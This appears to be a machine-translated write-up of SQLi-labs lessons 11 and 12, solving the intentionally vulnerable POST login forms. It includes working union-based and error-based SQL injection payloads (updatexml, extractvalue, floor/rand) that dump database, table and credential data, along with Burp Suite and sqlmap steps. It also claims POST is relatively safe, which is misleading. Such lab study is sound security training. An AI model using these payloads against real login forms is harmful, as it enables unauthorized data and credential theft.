sqlilabs less-11~12

less-11

A login function , Go to the source code to see if there is any other information

You can roughly construct a login function sql sentence

select * from table where uname = 'username' and passwd = 'password'

Let's see what type it is

The blue words below are as follows

You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use
near ‘1’ LIMIT 0,1’ at line 1

Um. , Is a single quotation mark type

Modify the structure sql sentence

select username,password from table where uname = ‘input_username’ and passwd = ‘input_password’

Blue word content

The used SELECT statements have a different number of columns

Blue word content

FUNCTION security.databsse does not exist
The database name obtained is security 了

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

1' union select 1,group_concat(username,password) from users #

Because it passes through POST request
Extra knowledge ：
POST and GET It's all about getting Web content, but POST There's a lot of data ,GET Only a few are limited , and GET The sent data will be displayed in the browser ,POST Can't , therefore POST A relatively safe .

So you can still use burp suite
Grab the bag and send it to Repeater Operate inside

One more sqlmap
hold burp suite Copy the package into the file

After scanning
Query the database --dbs

Press enter here

View the current database --current-db

see security The watch in

see security Table in Library users The column of

see security Table in Library users The column value of

Later, I found that this problem is based on errors
Then try it

• updatexml function

1' and updatexml(1,(concat(0x7c,(select database()))),1)#

• extractvalue function

1' and extractvalue(1,concat(0x7c,(select database())))#

• floor and count(*)

1' union select count(*),concat((select database()),floor(rand()*2))a from information_schema.tables  group by a#

1' union select count(*),str(concat((select database()),floor(rand()*2)),utf8)a from information_schema.tables  group by a#

Pick one at random

1' and updatexml(1,(concat(0x7c,(select group_concat(table_name) from information_schema.tables where table_schema = database()))),1)#

1' union select count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema =database()),floor(rand()*2))a from information_schema.tables  group by a#	

less-12

less-12 and less-11 almost , Only the injection point is different
less-12 Is double quotation marks with parentheses “)
select username.password from users where uname=(”“) and passwd=(”")